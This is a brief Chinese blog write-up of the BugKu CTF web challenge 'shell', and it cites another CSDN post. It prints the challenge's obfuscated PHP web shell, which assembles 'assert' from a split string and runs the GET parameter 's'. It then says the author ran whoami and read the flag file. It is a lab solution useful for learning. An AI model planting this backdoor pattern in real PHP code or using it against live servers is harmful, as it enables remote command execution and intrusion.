CTF-BugKu-web shell

参考:

BugKu_shell_bugku shell-CSDN博客文章浏览阅读1k次,点赞2次,收藏7次。访问目标地址,可以发现是一个空白页根据描述中说的马,最后是($_GET[‘s’]),所以应该是传入一个s参数发现whoami执行成功了,接下来看下都有什么文件找找flag在哪里查看这个flag什么什么的文件成功得到flag!..._bugku shellhttps://blog.csdn.net/qq_44959263/article/details/119634267

打开场景后,发现啥也没有

 分析题目给的描述:

 

<?php 
$poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>

assert函数

 ($_GET[‘s’]),URL中传入一个s参数

看下有什么文件

 查看flag文件

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值